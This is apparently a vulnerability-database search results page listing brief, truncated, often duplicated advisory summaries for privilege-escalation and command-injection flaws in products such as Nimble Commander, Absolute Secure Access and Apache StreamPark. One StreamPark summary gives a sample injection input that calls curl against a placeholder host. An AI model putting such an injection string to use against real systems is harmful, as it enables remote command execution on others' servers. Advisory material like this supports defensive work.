832 matches found
CVE-2024-7062 Local Privilege Escalation in Nimble Commander <= v1.6.0, Build 4087
Nimble Commander suffers from a privilege escalation vulnerability due to the server info.filesmanager.Files.PrivilegedIOHelperV2 performing improper/insufficient validation of a client’s authorization before executing an operation. Consequently, it is possible to execute system-level commands as...
CVE-2024-7062
CVE-2024-7062 affects Nimble Commander. The vulnerability is located in the server component info.filesmanager.Files.PrivilegedIOHelperV2 and arises from improper/insufficient validation of a client’s authorization before executing an operation. As described in the connected documents, this can e...
CVE-2024-40872
There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...
CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers
There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...
CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers
There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...
CVE-2024-40872
CVE-2024-40872 describes an elevation-of-privilege flaw in Absolute Secure Access, affecting server and client components before version 13.07. Attackers with local access and valid desktop credentials can pass invalid address data to a vulnerable component to manipulate tokens and elevate a norm...
PT-2024-29123 · Unknown · Absolute Secure Access
Name of the Vulnerable Software and Affected Versions: Absolute Secure Access versions prior to 13.07 Description: The issue is related to an elevation of privilege vulnerability in server and client components. Attackers with local access and valid desktop user credentials can elevate their...
Command Injection
org.apache.streampark:streampark is vulnerable to Command Injection. The vulnerability is caused due to insufficient input parameter validation, allowing attackers to insert commands. Exploiting this requires system-level access via user login, thereby limiting its risk due to controlled user...
GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2023-52291
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...
CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2023-52291
CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter < is used (for example, < (curl http://xxx.com)). An attack requires the user to be logged i...
Privilege Escalation
Microsoft.IO.Redist is vulnerable to Privilege Escalation. The vulnerability is due improper link resolution in the Visual Studio installer on Windows OS that allows an unprivileged user to manipulate the installation, leading to elevated SYSTEM level privileges...
The vulnerability of the Windows Hyper-V hardware virtualization system allows attackers to escalate their privileges.
The vulnerability of the Windows Hyper-V hardware virtualization system is related to a numerical overflow condition. Exploiting this vulnerability can allow an attacker to elevate their privileges to the SYSTEM level...
SoftMaker Office Permission License and Access Control Issues Vulnerability
Softmaker Office is a multi-platform supported office software from Softmaker, a German company. The software is used for word processing, spreadsheets, presentation design, and can also be scripted, and supports a variety of common Office file formats, as well as a variety of internal formats th...
pcp security update
An update is available for pcp. This update affects Rocky Linux 8. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list Performance Co-Pilot PCP is a suite of tools, services, and libraries for...